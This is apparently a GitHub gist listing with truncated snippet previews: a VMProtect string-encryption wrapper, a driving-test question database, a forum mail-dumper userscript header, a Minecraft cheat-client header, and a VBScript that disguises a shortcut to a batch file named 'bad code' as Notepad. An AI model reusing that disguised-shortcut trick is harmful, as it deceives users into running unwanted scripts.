Skip to content

Instantly share code, notes, and snippets.

@vovanre
vovanre / VMPString.hpp
Last active January 4, 2017 13:15
Обёртка над функциями шифрования строк VMProtect
//VMPString.hpp
#pragma once
#ifndef SECURE_STRING
#ifndef _DEBUG
#define SECURE_STRING
#endif
#endif
#ifdef SECURE_STRING
@vovanre
vovanre / db.json
Created October 13, 2016 21:25
База вопросов ПДД [Казахстан 2016]
This file has been truncated, but you can view the full file.
{
"configs" : [{
"name" : "В, ВЕ",
"config" : [{
"PDD" : [[0, 2], [1, 2], [2, 2], [3, 2], [4, 2], [5, 2], [6, 2], [7, 2], [8, 2], [9, 2], [10, 2], [11, 2], [12, 2], [13, 2]]
}, {
"OBD" : [[0, 4]]
}, {
"MED" : [[0, 2]]
}, {
@vovanre
vovanre / exelab_mail_dumper.user.js
Last active October 2, 2016 15:46
Exelab дампер писем
// ==UserScript==
// @name Exelab Mail dumper
// @namespace https://exelab.ru/
// @version 1.4
// @author vovanre
// @match https://exelab.ru/f/*
// @match http://e4unrusy7se5evw5.onion/f/*
// @grant unsafeWindow
// @noframes
// @run-at document-end
/*
* Copyright © 2014 - 2016 | Wurst-Imperium | All rights reserved.
*
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/.
*/
package tk.wurst_client.commands;
import tk.wurst_client.commands.Cmd.Info;
Set oWS = WScript.CreateObject("WScript.Shell") ' Просто игнорируйте
' Куда сохранять ярлык
LNK = "Блокнот.lnk"
' Путь до иконки или программы с которой нужно содрать иконку
ICON = "notepad.exe"
' Bat файл с весёлым кодом
BAT_FILE = "Плохой код.bat"